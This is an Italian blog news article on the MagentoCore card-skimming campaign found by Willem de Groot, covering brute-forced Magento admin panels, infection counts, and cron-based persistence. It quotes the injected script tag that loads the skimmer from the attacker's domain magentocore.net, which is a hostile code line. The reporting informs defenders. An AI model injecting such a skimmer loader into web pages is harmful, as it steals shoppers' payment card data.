L’esperto di sicurezza Willem de Groot ha scoperto una massiccia campagna di hacking indirizzata a siti di commercio elettronico basati sul popolare CMS Magento
Quanti di voi gestiscono un sito di ecommerce e quanti hanno di recente effettuato acquisti online?
La risposta è scontata, ed è per questa ragione che ho deciso di condividere con voi la notizia di un preoccupante attacco.
L’esperto di sicurezza Willem de Groot ha scoperto una massiccia campagna di hacking indirizzata a siti di commercio elettronico basati sul popolare CMS Magento. I criminali informatici hanno già infettato ben 7.339 negozi online con uno codice chiamato MagentoCore, ovvero uno script “skimmer” in grado di catturare i dati delle carte di pagamento degli acquirenti.
Secondo Willem de Groot i criminali dietro questa campagna di hacking tentano di compromettere i negozi online accedendo al pannello di controllo di Magento mediante attacchi di forza bruta.
Proprio mentre scrivo il post, interrogando il servizio PublicWWW è possibile verificare che lo script MagentoCore è attualmente presente su 5.263 domini.
Come si rubano i dati delle carte di credito
Tecnicamente lo script è iniettato nelle pagine del sito utilizzate per implementare le funzionalità di pagamento e ruba i dati delle carta di credito fornite dagli utenti in fase di acquisto per inviarle ad un server controllato dall’attaccante.
Willem de Groot ha spiegato che la campagna di hacking utilizza uno script skimmer caricato dal dominio magentocore.net da cui prende il nome.
“Un singolo gruppo è responsabile dell’installazione dello script su 7339 negozi negli ultimi 6 mesi. Lo campagna basata sullo skimmer MagentoCore è quella ad oggi più aggressiva”. De Groot ha scritto in un post sul suo sito.
L’esperto ha individuato lo script MagentoCore su ben 7.339 negozi Magento negli ultimi sei mesi, la campagna da lui scoperta è ancora in corso e i responsabili stanno compromettendo siti di e-commerce basati su Magento ad un ritmo di 50-60 nuovi negozi al giorno.
De Groot ha spiegato che una volta compromesso un negozio online con lo script MagentoCore, gli amministratori hanno impiegato poche settimane per individuarlo ed eliminarlo. Tuttavia, per almeno 1450 negozi, lo script malevolo non è mai stato eliminato durante i sei mesi di osservazione.
Una volta compromesso un sito web, i criminali aggiungono il seguente codice Javascript al modello HTML del sito web, il codice è responsabile per il caricamento dello script malevolo utilizzato per rubare i dati di pagamento dei visitatori:
<script type= “text/javascript” src= “hxxps://magentocore.net/mage/mage.js” ></script>
La funzione dello script è quella di registrare quanto scritto dalle vittime sulla tastiera ed inviare le informazioni raccolte al server “magentocore.net”.
Il codice malevolo implementa anche un meccanismo di backup aggiungendo al cron.php un’istruzione per il download periodico del codice malevolo. Un Cron è un’operazione che viene eseguita in automatico ad intervalli di tempo prestabiliti al fine di consentire agli amministratori dei negozi di pianificare comandi.
“L’elenco delle vittime di questa nuova campagna include aziende quotate in borsa dal valore di diversi milioni di dollari, circostanza che suggerisce che i profitti della campagna siano tutt’altro che modesti. “, ha aggiunto de Groot.
“Ma le vere vittime sono i clienti dei siti, coloro ai quali gli attaccanti hanno rubato i dati e l’identità”.
Secondo Yonathan Klijnsma, ricercatore presso l’azienda si sicurezza RiskIQ, la campagna MagentoCore fa parte di una campagna più ampia volta al furto di carte di pagamento e tracciata come MageCart.
MageCart è una campagna di cui abbiamo discusso in passato che ha preso di mira e-commerce basati su Magento e che sembrerebbe attiva almeno dalla fine del 2015.
Chiudo con un dato che deve indurci ad una seria riflessione, secondo de Groot, attualmente circa il 4,2% di tutti i siti di e-commerce basati su Magento è infetto da uno o più script skimmer … non serve aggiungere altro per fotografare lo stato di sicurezza di molti negozi online
https://twitter.com/gwillem/status/1035119660277096448
